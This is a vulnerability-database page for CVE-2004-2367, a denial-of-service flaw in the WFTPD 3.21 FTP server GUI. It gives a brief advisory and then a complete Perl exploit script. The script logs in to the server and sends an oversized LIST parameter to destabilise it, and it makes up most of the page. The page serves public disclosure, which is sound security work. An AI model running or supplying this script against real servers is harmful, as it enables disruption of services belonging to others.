Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2004-2367

Publish Date: 17 Mar 2004

                source: http://www.securityfocus.com/bid/9908/info

WFTPD server front end GUI has been reported to be prone to a denial of service. The issue is reported to present itself if a user who is logged into the affected service issues an FTP request with a large parameter. This will cause the server GUI to behave in an unstable manner, potentially preventing the GUI from opening.

#!/usr/bin/perl
# Multiple Vulnerabilities in WFTPD FTP Server version 3.21.1
# Created by Beyond Security Ltd. - All rights reserved.

use IO::Socket;

$host = "192.168.1.243";

$remote = IO::Socket::INET-&gt;new ( Proto =&gt; "tcp", PeerAddr =&gt; $host, PeerPort =&gt; "2119");

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (&lt;$remote&gt;)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}


$remote-&gt;autoflush(1);

my $ftp = "USER username\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (&lt;$remote&gt;)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join("", "PASS ", "password", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (&lt;$remote&gt;)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

$ftp = join ("", "LIST ", "A"x260, "\r\n"); # DoS ...

print $remote $ftp;
print $ftp;
sleep(1);

while (&lt;$remote&gt;)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

WFTPD Server GUI 3.21 - Remote Denial of Service

Vulmon Search

About

Products

Connect